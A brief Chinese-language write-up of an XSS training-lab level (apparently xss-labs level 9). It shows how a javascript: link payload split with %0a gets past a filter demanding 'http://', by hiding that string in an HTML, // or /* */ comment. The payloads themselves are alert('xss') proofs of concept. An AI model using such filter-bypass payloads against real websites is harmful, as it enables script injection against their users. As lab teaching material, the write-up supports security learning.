1.这题的过滤规则跟上一题差不多,只不过对输入的数据进行判断有没有带"http://"这个协议头。
2.那也就是说我们输入的数据必须要带有"http://"才可以,
上一题的paylaod:
javascrip%0at:alert('xss')
我们需要添加"http://"进去而且不妨碍原代码的执行,那么可以使用注释法
javascrip%0at:alert('xss')<!--http://-->
javascrip%0at:alert('xss')//http://
javascrip%0at:alert('xss')/*http://*/
提交后,绕过了检查
然后点击超链接会执行javascript代码
[…] xss-labs level 9 […]
1
1